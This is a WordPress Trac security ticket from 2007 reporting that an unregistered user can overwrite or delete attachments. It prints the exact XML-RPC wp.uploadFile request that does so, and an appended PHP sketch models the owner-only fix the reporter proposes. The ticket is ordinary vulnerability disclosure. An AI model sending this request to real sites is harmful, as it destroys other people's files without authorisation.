[wp-trac] [WordPress Trac] #4422: Anyone can delete attachments
WordPress Trac
wp-trac at lists.automattic.com
Fri Jun 8 14:48:18 GMT 2007
#4422: Anyone can delete attachments
----------------------+-----------------------------------------------------
Reporter: xknown | Owner: anonymous
Type: defect | Status: new
Priority: normal | Milestone: 2.2.2
Component: Security | Version: 2.2
Severity: normal | Keywords:
----------------------+-----------------------------------------------------
An unregistered user can delete attachments through an xmlrpc request:
{{{
<methodCall>
<methodName>wp.uploadFile</methodName>
<params>
<param><value>1</value></param>
<param><value>1</value></param>
<param><value>1</value></param>
<struct>
<member><name>name</name><value>attachement_name</value></member>
<member><name>overwrite</name><value>1</value></member>
</struct>
</params>
</methodCall>
}}}
I'll submit a partial fix -- I think that a user should only delete their
own uploaded files.
--
Ticket URL: <http://trac.wordpress.org/ticket/4422>
WordPress Trac <http://trac.wordpress.org/>
WordPress blogging software
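The rule the reporter proposes (a user may only replace or delete their own uploads), as an added example that is not part of the ticket and is not WordPress code. It is an in-memory PHP model in which `upload_file`, `Denied`, the two users and the attachment are all constructed for illustration; it authenticates first, then checks the upload capability, then ownership, and only then touches the stored file.

```php
<?php
declare(strict_types=1);

// In-memory model (constructed data, hypothetical names); not WordPress code.
final class Denied extends RuntimeException {}

$users = [
    'alice' => ['id' => 1, 'hash' => password_hash('alice-pw', PASSWORD_DEFAULT), 'caps' => ['upload_files']],
    'bob'   => ['id' => 2, 'hash' => password_hash('bob-pw', PASSWORD_DEFAULT), 'caps' => ['upload_files']],
];
$attachments = ['logo.png' => ['owner' => 1]]; // alice's upload

function upload_file(array $users, array &$attachments, string $login,
                     string $pass, string $name, bool $overwrite): string
{
    // 1. Authenticate before reading or changing any stored attachment.
    $user = $users[$login] ?? null;
    if ($user === null || !password_verify($pass, $user['hash'])) {
        throw new Denied('bad credentials');
    }
    // 2. The account must be allowed to upload at all.
    if (!in_array('upload_files', $user['caps'], true)) {
        throw new Denied('no upload capability');
    }
    // 3. An existing file is replaced only on request, and only by its owner.
    $existing = $attachments[$name] ?? null;
    if ($existing !== null) {
        if (!$overwrite) {
            return 'kept existing';
        }
        if ($existing['owner'] !== $user['id']) {
            throw new Denied('not the owner');
        }
    }
    $attachments[$name] = ['owner' => $user['id']];
    return $existing === null ? 'created' : 'replaced';
}

// Three callers target the same file: the placeholder values from the ticket's
// request used as login and password, another registered uploader, and the owner.
foreach ([['1', '1'], ['bob', 'bob-pw'], ['alice', 'alice-pw']] as [$login, $pass]) {
    try {
        $result = upload_file($users, $attachments, $login, $pass, 'logo.png', true);
    } catch (Denied $e) {
        $result = 'denied: ' . $e->getMessage();
    }
    echo "$login: $result\n";
}
```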